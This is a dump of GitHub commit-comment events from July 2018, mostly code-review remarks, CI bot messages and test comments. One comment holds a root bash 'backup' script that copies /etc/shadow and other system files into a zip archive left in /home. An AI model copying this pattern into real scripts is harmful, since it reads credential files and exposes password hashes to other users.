{"id":"7992663309","type":"CommitCommentEvent","actor":{"login":"itzfarrell"},"repo":{"name":"pistawallet/bitcoin"},"payload":{"comment":{"id":29773426,"position":null,"line":null,"path":null,"commit_id":"1a4c0edc1181bb98f29d7dc098e0702a4f72daf8","created_at":"2018-07-20T02:56:21Z","updated_at":"2018-07-20T02:56:21Z","author_association":"NONE","body":"Hey buddy how are you? I have a friend who has someone send them Bitcoin and for some reason insisted they use pistawallet.. so now my friend who knows nothing about BTC whatsoever has .097btc 'stuck' in this wallet, I want to but the coin from them, but I cannot for the life of me find a place to send coins and enter an address of the wallet I want them sent to!! I've poured thru your source code and just don't see anything anywhere on how to do that... I'm an IT consultant by trade and while I'm not a developer like you,. I've got a very solid understanding of code etc.. I'd very much appreciate it if you could please get back to me with some information as to how to get the coins out of your wallet and sent over to another wallet - pretty much ANY wallet. Please advise? Thanks so much for your time and help in advance!! Really cool little wallet you put together here dude! REALLY any help you can give me! Thanks. -johh"}},"created_at":"2018-07-20T02:56:21Z"}
{"id":"7992666400","type":"CommitCommentEvent","actor":{"login":"jwang0512"},"repo":{"name":"jwang0512/soui"},"payload":{"comment":{"id":29773431,"position":null,"line":null,"path":null,"commit_id":"e5f4f701818a5687cf51eaf90db999ee1820f5dd","created_at":"2018-07-20T02:57:34Z","updated_at":"2018-07-20T02:57:34Z","author_association":"OWNER","body":"check if pSender is not null. (will be null if the event is not generated by SOUI Object)"}},"created_at":"2018-07-20T02:57:34Z"}
{"id":"7996930649","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29783986,"position":null,"line":null,"path":null,"commit_id":"ebf1a7c34b9628ff9489a131584c5188e99a06cb","created_at":"2018-07-20T20:00:35Z","updated_at":"2018-07-20T20:00:35Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-870](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-870).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-870-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T20:00:35Z"}
{"id":"7996933680","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"NikitaSharipov/lesson2"},"payload":{"comment":{"id":29783996,"position":7,"line":4,"path":"data.rb","commit_id":"87e003b3d445b6dff65d604c11918fb67e751de1","created_at":"2018-07-20T20:01:18Z","updated_at":"2018-07-20T20:01:18Z","author_association":"NONE","body":"Сделай просто массив:\r\n[31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\r\nЗачем тебе эти названия месяцев, если ты нигде их не используешь?"}},"created_at":"2018-07-20T20:01:18Z"}
{"id":"7996935367","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29783999,"position":null,"line":null,"path":null,"commit_id":"d994ff3b2ce0310f3e45687dc81a7a4352fc19bf","created_at":"2018-07-20T20:01:42Z","updated_at":"2018-07-20T20:01:42Z","author_association":"COLLABORATOR","body":"![image](https://user-images.githubusercontent.com/6131799/43022713-790d61b6-8c68-11e8-8c83-3af3ac65ec9a.png)\r\n"}},"created_at":"2018-07-20T20:01:42Z"}
{"id":"7996935577","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"ubiyca5/rubylesson"},"payload":{"comment":{"id":29784001,"position":23,"line":23,"path":"lesson_1/discriminant.rb","commit_id":"130359db57e1919110573c614e45f0ca6806d220","created_at":"2018-07-20T20:01:44Z","updated_at":"2018-07-20T20:01:44Z","author_association":"NONE","body":"Нужны пробелы после запятых. Рекомендую к изучению [ruby style guide](https://github.com/arbox/ruby-style-guide)"}},"created_at":"2018-07-20T20:01:44Z"}
{"id":"7996937328","type":"CommitCommentEvent","actor":{"login":"suborb"},"repo":{"name":"z88dk/z88dk"},"payload":{"comment":{"id":29784004,"position":25,"line":25,"path":"libsrc/graphics/ace/udg/zx_hardcopy.asm","commit_id":"0968b9bfbcffae162f38991e349712f6a8191c6c","created_at":"2018-07-20T20:02:09Z","updated_at":"2018-07-20T20:02:09Z","author_association":"MEMBER","body":"@zx70 It's probably worth integrating with the generic console and using the font that's defined there - the font is available under the `CRT_FONT` label. That way people can decide what font they want to print using!"}},"created_at":"2018-07-20T20:02:09Z"}
{"id":"7996938102","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"ubiyca5/rubylesson"},"payload":{"comment":{"id":29784005,"position":37,"line":37,"path":"lesson_1/discriminant.rb","commit_id":"130359db57e1919110573c614e45f0ca6806d220","created_at":"2018-07-20T20:02:19Z","updated_at":"2018-07-20T20:02:19Z","author_association":"NONE","body":"Лишние пробелы впереди"}},"created_at":"2018-07-20T20:02:19Z"}
{"id":"7996939745","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"ubiyca5/rubylesson"},"payload":{"comment":{"id":29784008,"position":36,"line":36,"path":"lesson_1/discriminant.rb","commit_id":"130359db57e1919110573c614e45f0ca6806d220","created_at":"2018-07-20T20:02:44Z","updated_at":"2018-07-20T20:02:44Z","author_association":"NONE","body":"по пробелам вокруг возведения в степень есть исключения, смотри style guide"}},"created_at":"2018-07-20T20:02:44Z"}
{"id":"7996940852","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"NikitaSharipov/lesson2"},"payload":{"comment":{"id":29784012,"position":5,"line":20,"path":"magazin.rb","commit_id":"87e003b3d445b6dff65d604c11918fb67e751de1","created_at":"2018-07-20T20:03:00Z","updated_at":"2018-07-20T20:03:00Z","author_association":"NONE","body":"вместо merge лучше использовать просто \r\nshop_hash[name] = { count: count, price: price }\r\nИ короче, и никакого вложенного hash в аргументы метода"}},"created_at":"2018-07-20T20:03:00Z"}
{"id":"7996944511","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"ubiyca5/rubylesson"},"payload":{"comment":{"id":29784016,"position":17,"line":17,"path":"lesson_1/ideal_weigth.rb","commit_id":"130359db57e1919110573c614e45f0ca6806d220","created_at":"2018-07-20T20:03:54Z","updated_at":"2018-07-20T20:03:54Z","author_association":"NONE","body":"Integer().to_i, достаточно to_i"}},"created_at":"2018-07-20T20:03:54Z"}
{"id":"7996945324","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"NikitaSharipov/lesson2"},"payload":{"comment":{"id":29784019,"position":11,"line":13,"path":"vowels.rb","commit_id":"87e003b3d445b6dff65d604c11918fb67e751de1","created_at":"2018-07-20T20:04:07Z","updated_at":"2018-07-20T20:04:07Z","author_association":"NONE","body":"Аналогично, не надо использовать meger\r\nvowels_hash[value] = index\r\nсогласись это лучше \r\nvowels_hash.merge!(value.scan(/[aeouiy]/)[0] => index)    \r\n\r\n"}},"created_at":"2018-07-20T20:04:07Z"}
{"id":"7996949118","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"ubiyca5/rubylesson"},"payload":{"comment":{"id":29784030,"position":17,"line":17,"path":"lesson_1/ideal_weigth.rb","commit_id":"130359db57e1919110573c614e45f0ca6806d220","created_at":"2018-07-20T20:05:03Z","updated_at":"2018-07-20T20:05:03Z","author_association":"NONE","body":"а зачем to_i?"}},"created_at":"2018-07-20T20:05:03Z"}
{"id":"7996949210","type":"CommitCommentEvent","actor":{"login":"e9gille"},"repo":{"name":"the-carlisle-group/Acre-Desktop"},"payload":{"comment":{"id":29784031,"position":8,"line":6,"path":"APLSource/_code-0/getSource-8.function","commit_id":"ea7b5846f4b906e6e8f94df1ff1c922aea829fda","created_at":"2018-07-20T20:05:05Z","updated_at":"2018-07-20T20:05:05Z","author_association":"COLLABORATOR","body":"@PhilLast Can you recall why this was introduced?\r\nI'm afraid it is causing me issues as I have a project nested under a folder with an initial `.` that I need to be able to open. I don't control the naming of the parent folder and it is intentionally named that way.\r\n\r\nI can understand that you would want to ignore hidden files/folders within a source folder, but how about allowing a project that resides within a hidden folder?\r\n\r\nSuggestion:\r\n\r\n`path date/⍨←⊂~∨/'/.'⍷(≢src)↓⍤1↑path`"}},"created_at":"2018-07-20T20:05:05Z"}
{"id":"7996951595","type":"CommitCommentEvent","actor":{"login":"dimisa-RUAdList"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29784033,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-20T20:05:39Z","updated_at":"2018-07-20T20:05:39Z","author_association":"NONE","body":"These domain zones are very often found in RU AdList."}},"created_at":"2018-07-20T20:05:39Z"}
{"id":"7996955653","type":"CommitCommentEvent","actor":{"login":"elnurlinux"},"repo":{"name":"elnurlinux/Bash_script_to_backup"},"payload":{"comment":{"id":29784043,"position":null,"line":null,"path":null,"commit_id":"9fad5335f6afc8d0e11b31cb060cdecefea53dfe","created_at":"2018-07-20T20:06:31Z","updated_at":"2018-07-20T20:06:31Z","author_association":"OWNER","body":"#!/bin/bash\r\n#this script backup linux system important files\r\nif [ $(id -u) -eq 0 ]; then\r\n\techo \"System importants files are beging backup...........\"\r\n\tsleep 1\r\n\tmkdir /home/Backup\r\n\t\r\n\t\r\n\t\r\n\tcp /etc/crontab /home/Backup\r\n\tcp /etc/fstab /home/Backup\r\n\tcp /etc/group /home/Backup\r\n\tcp /etc/hosts /home/Backup\r\n\tcp /etc/hosts.allow /home/Backup\r\n\tcp /etc/hosts.deny /home/Backup\r\n\tcp /etc/issue /home/Backup\r\n\tcp /etc/motd /home/Backup\r\n\tcp /etc/passwd /home/Backup\r\n\tcp /etc/shadow /home/Backup\r\n\tcp /etc/profile /home/Backup\r\n\tcp /etc/resolv.conf /home/Backup\r\n\tcp /etc/securetty /home/Backup\r\n\tcp /etc/meminfo /home/Backup\r\n\t\r\n\tcd /home/Backup\t\r\n\r\n\tfor FILE in `ls`;do\r\n\t\tzip -r systemIFB_`date +%Y%m%d`.zip $FILE\r\n\tdone\r\n\tsleep 3\r\n\tcp systemIFB_`date +%Y%m%d`.zip ../\r\n\r\n\tcd ..\r\n\r\n\trm -rf /home/Backup\r\n\techo \"\\nYour backup file saved in /home/systemIFB_`date +%Y%m%d`.zip\\n\"\r\n\r\n\t\r\nelse\r\n\techo \"Only root may delete users to the system\"\r\n\texit 1\r\nfi"}},"created_at":"2018-07-20T20:06:31Z"}
{"id":"7996963370","type":"CommitCommentEvent","actor":{"login":"andylokandy"},"repo":{"name":"dcao/elba"},"payload":{"comment":{"id":29784057,"position":37,"line":291,"path":"src/lib/retrieve/cache.rs","commit_id":"9649d4ad5d1be95d9f4f79bfda8c88b33ecbeb1e","created_at":"2018-07-20T20:08:22Z","updated_at":"2018-07-20T20:08:22Z","author_association":"CONTRIBUTOR","body":"Hash should be cached internally(maybe lazycell), since Build would requires source hash repeately."}},"created_at":"2018-07-20T20:08:22Z"}
{"id":"7996965107","type":"CommitCommentEvent","actor":{"login":"AlexLamson"},"repo":{"name":"AlexLamson/ledcube"},"payload":{"comment":{"id":29784060,"position":null,"line":null,"path":null,"commit_id":"32164b7b62285c280f76ca87fae1cf825e36b501","created_at":"2018-07-20T20:08:48Z","updated_at":"2018-07-20T20:08:48Z","author_association":"OWNER","body":"d u m b"}},"created_at":"2018-07-20T20:08:48Z"}
{"id":"7996967187","type":"CommitCommentEvent","actor":{"login":"javadkhodadadi"},"repo":{"name":"javadkhodadadi/javadkhodadadi.github.io"},"payload":{"comment":{"id":29784064,"position":null,"line":null,"path":null,"commit_id":"1dc84b499a98180bde75c6cb7a10aa20a030531b","created_at":"2018-07-20T20:09:19Z","updated_at":"2018-07-20T20:09:19Z","author_association":"OWNER","body":"![header_background](https://user-images.githubusercontent.com/41486349/43022975-72770094-8c7e-11e8-9abd-255ae965e3ad.jpg)\r\n"}},"created_at":"2018-07-20T20:09:19Z"}
{"id":"7996971295","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29784074,"position":null,"line":null,"path":null,"commit_id":"f03c2c5cc7a629bb2b450d37a9291eab63536519","created_at":"2018-07-20T20:10:15Z","updated_at":"2018-07-20T20:10:15Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-147](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-147).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-147-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T20:10:15Z"}
{"id":"7996975056","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29784084,"position":null,"line":null,"path":null,"commit_id":"23cfec527d5a616b76f8222d9548e030e66d3254","created_at":"2018-07-20T20:11:11Z","updated_at":"2018-07-20T20:11:11Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [allenfearp](https://allenfearp-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/professional-services](https://allenfearp-static-docs.pantheonsite.io/docs/professional-services)\n"}},"created_at":"2018-07-20T20:11:11Z"}
{"id":"7996976512","type":"CommitCommentEvent","actor":{"login":"tesfatsion2004"},"repo":{"name":"tesfatsion2004/lecture0"},"payload":{"comment":{"id":29784088,"position":5,"line":7,"path":"hello.html","commit_id":"b230823f816eb3b5c0c789a822cfa58291bd8d19","created_at":"2018-07-20T20:11:31Z","updated_at":"2018-07-20T20:11:31Z","author_association":"OWNER","body":"Test comment"}},"created_at":"2018-07-20T20:11:31Z"}
{"id":"7996977653","type":"CommitCommentEvent","actor":{"login":"tesfatsion2004"},"repo":{"name":"tesfatsion2004/lecture0"},"payload":{"comment":{"id":29784092,"position":5,"line":7,"path":"hello.html","commit_id":"b230823f816eb3b5c0c789a822cfa58291bd8d19","created_at":"2018-07-20T20:11:46Z","updated_at":"2018-07-20T20:11:46Z","author_association":"OWNER","body":"Why"}},"created_at":"2018-07-20T20:11:46Z"}
{"id":"7996982153","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"ubiyca5/rubylesson"},"payload":{"comment":{"id":29784100,"position":56,"line":56,"path":"lesson_1/right_triangle.rb","commit_id":"130359db57e1919110573c614e45f0ca6806d220","created_at":"2018-07-20T20:12:54Z","updated_at":"2018-07-20T20:12:54Z","author_association":"NONE","body":"Интересное решение. Но, в данном случае ты мутировал массив с исходными данными, лучше все таки сохранять их (исходные данные) и оперировать уже с вычисляемыми значениями. Еще в ruby есть множество функций, которые помогли бы при решении этой задачи, например найти гипотенузу и катеты можно так:\r\n```\r\nh = data.max\r\nc1, c2 = data.min(2)\r\n```\r\nНо в целом хорошо!"}},"created_at":"2018-07-20T20:12:54Z"}
{"id":"7996982240","type":"CommitCommentEvent","actor":{"login":"la60312"},"repo":{"name":"igsb/dpdl"},"payload":{"comment":{"id":29784101,"position":63,"line":11,"path":"app/controllers/api/patients_controller.rb","commit_id":"b28b7402f2faa303bb08e90badd863c6bd610938","created_at":"2018-07-20T20:12:55Z","updated_at":"2018-07-20T20:12:55Z","author_association":"COLLABORATOR","body":"indent with 2 space\r\nhttps://github.com/airbnb/ruby\r\n\r\n"}},"created_at":"2018-07-20T20:12:55Z"}
{"id":"7996983561","type":"CommitCommentEvent","actor":{"login":"la60312"},"repo":{"name":"igsb/dpdl"},"payload":{"comment":{"id":29784104,"position":94,"line":46,"path":"app/controllers/api/vcf_files_controller.rb","commit_id":"b28b7402f2faa303bb08e90badd863c6bd610938","created_at":"2018-07-20T20:13:15Z","updated_at":"2018-07-20T20:13:15Z","author_association":"COLLABORATOR","body":"indent with 2 spaces"}},"created_at":"2018-07-20T20:13:15Z"}
{"id":"7996983781","type":"CommitCommentEvent","actor":{"login":"tomgoth07"},"repo":{"name":"tomgoth07/CRM"},"payload":{"comment":{"id":29784107,"position":34,"line":249,"path":"src/pages/recibos-detalle/recibos-detalle.ts","commit_id":"74b52edb039a98d3d43d62cf2e224143707e91cf","created_at":"2018-07-20T20:13:18Z","updated_at":"2018-07-20T20:13:18Z","author_association":"OWNER","body":"Corrección en nomenclatura"}},"created_at":"2018-07-20T20:13:18Z"}
{"id":"7996987995","type":"CommitCommentEvent","actor":{"login":"la60312"},"repo":{"name":"igsb/dpdl"},"payload":{"comment":{"id":29784111,"position":10,"line":7,"path":"app/controllers/api/vcf_files_controller.rb","commit_id":"b28b7402f2faa303bb08e90badd863c6bd610938","created_at":"2018-07-20T20:14:21Z","updated_at":"2018-07-20T20:14:21Z","author_association":"COLLABORATOR","body":"indent with 2 spaces"}},"created_at":"2018-07-20T20:14:21Z"}
{"id":"7996988386","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"ubiyca5/rubylesson"},"payload":{"comment":{"id":29784112,"position":30,"line":30,"path":"lesson_1/triangle_square.rb","commit_id":"130359db57e1919110573c614e45f0ca6806d220","created_at":"2018-07-20T20:14:27Z","updated_at":"2018-07-20T20:14:27Z","author_association":"NONE","body":"Сомнительное решение, что такое 1 и 2 😄 которое потом конвертируется у тебя в такое же \"непонятное\" условие"}},"created_at":"2018-07-20T20:14:27Z"}
{"id":"7996989329","type":"CommitCommentEvent","actor":{"login":"la60312"},"repo":{"name":"igsb/dpdl"},"payload":{"comment":{"id":29784117,"position":119,"line":59,"path":"app/controllers/api/vcf_files_controller.rb","commit_id":"b28b7402f2faa303bb08e90badd863c6bd610938","created_at":"2018-07-20T20:14:40Z","updated_at":"2018-07-20T20:14:40Z","author_association":"COLLABORATOR","body":"indent with 2 spaces"}},"created_at":"2018-07-20T20:14:40Z"}
{"id":"7996993185","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"hookbil/ruby_learning"},"payload":{"comment":{"id":29784129,"position":5,"line":8,"path":"lesson_2/alphabet.rb","commit_id":"dbec462c1813a40b9e7a2d250d4b63dbce5ef8de","created_at":"2018-07-20T20:15:41Z","updated_at":"2018-07-20T20:15:41Z","author_association":"NONE","body":"vowel - это главная\r\nvowels - это гласные. \r\n\r\nЗа этим надо следить, или код становится не читаемым\r\n\r\nПлюс не надо каждый раз создавать массив, создаешь го до alphabet.each"}},"created_at":"2018-07-20T20:15:41Z"}
{"id":"7996998752","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"hookbil/ruby_learning"},"payload":{"comment":{"id":29784134,"position":1,"line":5,"path":"lesson_2/alphabet.rb","commit_id":"dbec462c1813a40b9e7a2d250d4b63dbce5ef8de","created_at":"2018-07-20T20:17:04Z","updated_at":"2018-07-20T20:17:04Z","author_association":"NONE","body":"key - плохое обозначение. \r\nиспользуй char или letter или сharacter\r\n"}},"created_at":"2018-07-20T20:17:04Z"}
{"id":"7996999574","type":"CommitCommentEvent","actor":{"login":"Dgocamp"},"repo":{"name":"Dgocamp/LeydeOhm"},"payload":{"comment":{"id":29784138,"position":3,"line":0,"path":"src/leydeohm/LeyDeOhm.java","commit_id":"de878d1ae227c8f6c2f41c7cb8cc53821ace5662","created_at":"2018-07-20T20:17:16Z","updated_at":"2018-07-20T20:17:16Z","author_association":"OWNER","body":"Ghhj\n"}},"created_at":"2018-07-20T20:17:16Z"}
{"id":"7997001462","type":"CommitCommentEvent","actor":{"login":"sukima"},"repo":{"name":"ruanyl/vim-sort-imports"},"payload":{"comment":{"id":29784144,"position":17,"line":27,"path":"autoload/import_sort.vim","commit_id":"f31a7addec226c67c3d75bb6fd33f7501c6362c6","created_at":"2018-07-20T20:17:44Z","updated_at":"2018-07-20T20:17:44Z","author_association":"NONE","body":"I was upset that renke/import-sort ignores stdin. Sorry for the tone.\r\n\r\nThere is a work around to prevent you from the need to write / reread the file. But I only know how to do it on unix like systems:\r\n\r\n```vim\r\nexec \"%!\" . l:import_sort_executable . \" /dev/stdin\"\r\n```\r\n\r\nThis will take the whole buffer (even unsaved) and pipe it to stdin into the program and the stdout is read back and replaces the buffer. Which means this is an undoable action in vim and doesn't disturb the filesystem like the `--write` argument does.\r\n\r\nThe unfortunate part is that import-sort blindly open a file by name and does not use the `process.stdin` stream. Which means you have to force this case with `/dev/stdin` which is a unix only thing. I've heard others use `0` as the filename in windows to mean stdin but I would be unable to verify this on my computers. Plus it means this script would have to check which OS it is on to choose the right stdin filename."}},"created_at":"2018-07-20T20:17:44Z"}
{"id":"7997001666","type":"CommitCommentEvent","actor":{"login":"RiskyShuffle"},"repo":{"name":"RiskyShuffle/Putty"},"payload":{"comment":{"id":29784145,"position":null,"line":null,"path":null,"commit_id":"aa18f71eeaa46cbe5f1bd4c6d0c418f24ac6f3e9","created_at":"2018-07-20T20:17:48Z","updated_at":"2018-07-20T20:17:48Z","author_association":"OWNER","body":"I can't wait to drop off the battle bus and meet some of you on the battlefield in Fortnite"}},"created_at":"2018-07-20T20:17:48Z"}
{"id":"7997002650","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29784147,"position":null,"line":null,"path":null,"commit_id":"172f7521937dddb366d16cffdaed7cd55e6970e2","created_at":"2018-07-20T20:18:03Z","updated_at":"2018-07-20T20:18:03Z","author_association":"NONE","body":"Correct-merge-mistake-with-initializing-CoilDesWaterDeltaT (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2965 of 2982 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 17 tests had: Table big diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 626\n * Failed: 17\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-172f7521937dddb366d16cffdaed7cd55e6970e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-172f7521937dddb366d16cffdaed7cd55e6970e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.43%25-yellow.png)</a> \n"}},"created_at":"2018-07-20T20:18:03Z"}
{"id":"7997008745","type":"CommitCommentEvent","actor":{"login":"flack"},"repo":{"name":"flack/ranger"},"payload":{"comment":{"id":29784158,"position":15,"line":345,"path":"src/Ranger.php","commit_id":"9c2a88054b1b2a0ad4b566463553826c199fc8d5","created_at":"2018-07-20T20:19:34Z","updated_at":"2018-07-20T20:19:34Z","author_association":"OWNER","body":"I wonder if it wouldn't be simpler to just set the end date to the same value as the start date before doing the matching. That would also take care of DST differences (which might be a cornercase of this cornercase)"}},"created_at":"2018-07-20T20:19:34Z"}
{"id":"7997009010","type":"CommitCommentEvent","actor":{"login":"landfillbaby"},"repo":{"name":"sirjuddington/SLADE"},"payload":{"comment":{"id":29784161,"position":null,"line":null,"path":null,"commit_id":"013de1565aad10e33f2afe2f902c99a91fadf96f","created_at":"2018-07-20T20:19:38Z","updated_at":"2018-07-20T20:19:38Z","author_association":"CONTRIBUTOR","body":"you should probably do -mtc- for 7z too"}},"created_at":"2018-07-20T20:19:38Z"}
{"id":"7997011932","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29784169,"position":null,"line":null,"path":null,"commit_id":"4daff402bed1baef35e4459119af60f9dd3c299d","created_at":"2018-07-20T20:20:19Z","updated_at":"2018-07-20T20:20:19Z","author_association":"OWNER","body":"@rob-Hitchens implemented above comments in bed4dd9"}},"created_at":"2018-07-20T20:20:19Z"}
{"id":"7997012538","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"hookbil/ruby_learning"},"payload":{"comment":{"id":29784173,"position":25,"line":9,"path":"lesson_2/fibonacci.rb","commit_id":"dbec462c1813a40b9e7a2d250d4b63dbce5ef8de","created_at":"2018-07-20T20:20:29Z","updated_at":"2018-07-20T20:20:29Z","author_association":"NONE","body":"exit лучше не использовать вообще\r\nесть return\r\n\r\nА так же сделай, чтобы вывод массива был не внутри его составления"}},"created_at":"2018-07-20T20:20:29Z"}
{"id":"7997012874","type":"CommitCommentEvent","actor":{"login":"CaMer0n"},"repo":{"name":"e107inc/e107-test"},"payload":{"comment":{"id":29784174,"position":null,"line":null,"path":null,"commit_id":"249be2979c9a32d31f63e211fe232a6929de1b80","created_at":"2018-07-20T20:20:33Z","updated_at":"2018-07-20T20:20:33Z","author_association":"MEMBER","body":"@Deltik It appears that when running tests the prefs are either not updated, or the cache is being used.  Not sure what is happening, but thought maybe you might have some ideas?"}},"created_at":"2018-07-20T20:20:33Z"}
{"id":"7997015982","type":"CommitCommentEvent","actor":{"login":"maryvilleDevProf"},"repo":{"name":"Maryville-SWDV-600-FL15-1W/week-1-review-maryvilleDevProf"},"payload":{"comment":{"id":29784183,"position":2,"line":2,"path":"fight_song.py","commit_id":"2c50ab40472ba4d7aaf99fddbbd4a5033fb4b5ac","created_at":"2018-07-20T20:21:20Z","updated_at":"2018-07-20T20:21:20Z","author_association":"COLLABORATOR","body":"Hey, you didn't actually write the fight song, what you needed to do is...."}},"created_at":"2018-07-20T20:21:20Z"}
{"id":"7997015983","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"hookbil/ruby_learning"},"payload":{"comment":{"id":29784184,"position":1,"line":1,"path":"lesson_2/shopping.rb","commit_id":"aa8ceabba18de964e2d9aca4a143a50fd598eed5","created_at":"2018-07-20T20:21:20Z","updated_at":"2018-07-20T20:21:20Z","author_association":"NONE","body":"не надо использовать инстанс переменные без классов и их экземляров"}},"created_at":"2018-07-20T20:21:20Z"}
{"id":"7997017633","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29784186,"position":null,"line":null,"path":null,"commit_id":"f03c2c5cc7a629bb2b450d37a9291eab63536519","created_at":"2018-07-20T20:21:44Z","updated_at":"2018-07-20T20:21:44Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-147](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-147).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-147-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T20:21:44Z"}
{"id":"7997018527","type":"CommitCommentEvent","actor":{"login":"maryvilleDevProf"},"repo":{"name":"Maryville-SWDV-600-FL15-1W/week-1-review-maryvilleDevProf"},"payload":{"comment":{"id":29784188,"position":7,"line":5,"path":"bitcoin_converter.py","commit_id":"2c50ab40472ba4d7aaf99fddbbd4a5033fb4b5ac","created_at":"2018-07-20T20:21:57Z","updated_at":"2018-07-20T20:21:57Z","author_association":"COLLABORATOR","body":"This is great work, it may be easier to read if you add comments or remove this line"}},"created_at":"2018-07-20T20:21:57Z"}
{"id":"7997019017","type":"CommitCommentEvent","actor":{"login":"TheRealMarcusChiu"},"repo":{"name":"tanda-pay/tanda-pay-simulation"},"payload":{"comment":{"id":29784190,"position":12,"line":19,"path":"src/app/app.component.css","commit_id":"7333a07d4a5f794a351a5850e02f50377ea9a219","created_at":"2018-07-20T20:22:04Z","updated_at":"2018-07-20T20:22:04Z","author_association":"CONTRIBUTOR","body":"BOOOOOOOOOOOO"}},"created_at":"2018-07-20T20:22:04Z"}
{"id":"7997019625","type":"CommitCommentEvent","actor":{"login":"sgmshaik"},"repo":{"name":"sgmshaik/3kProtocol"},"payload":{"comment":{"id":29784191,"position":null,"line":null,"path":null,"commit_id":"ceee567f3e00d14b42923358d38162ee88509b47","created_at":"2018-07-20T20:22:12Z","updated_at":"2018-07-20T20:22:12Z","author_association":"OWNER","body":"Parallel Code "}},"created_at":"2018-07-20T20:22:12Z"}
{"id":"7997020433","type":"CommitCommentEvent","actor":{"login":"TheRealMarcusChiu"},"repo":{"name":"tanda-pay/tanda-pay-simulation"},"payload":{"comment":{"id":29784192,"position":8,"line":6,"path":"src/app/app.component.html","commit_id":"7333a07d4a5f794a351a5850e02f50377ea9a219","created_at":"2018-07-20T20:22:23Z","updated_at":"2018-07-20T20:22:23Z","author_association":"CONTRIBUTOR","body":"shivbdahvkbsv soewbs goebg efbgyauowb wafgu wiebgyuo broea"}},"created_at":"2018-07-20T20:22:23Z"}
{"id":"7997022742","type":"CommitCommentEvent","actor":{"login":"fujikaiser"},"repo":{"name":"fujikaiser/PoetryWebsite"},"payload":{"comment":{"id":29784195,"position":null,"line":null,"path":null,"commit_id":"0562924afebf1182fcd14e06eb630ac98f6390f9","created_at":"2018-07-20T20:22:56Z","updated_at":"2018-07-20T20:22:56Z","author_association":"OWNER","body":"delete index.html for php"}},"created_at":"2018-07-20T20:22:56Z"}
{"id":"7997022801","type":"CommitCommentEvent","actor":{"login":"OliviaBranch"},"repo":{"name":"OliviaBranch/huge"},"payload":{"comment":{"id":29784196,"position":5,"line":18,"path":"handsome1.md","commit_id":"b61efcb4a12f904f390993ba4568524201c1cf76","created_at":"2018-07-20T20:22:57Z","updated_at":"2018-07-20T20:22:57Z","author_association":"OWNER","body":"kjas jjaslf saflj asf aslkjdf asdkjfasf;asdfj"}},"created_at":"2018-07-20T20:22:57Z"}
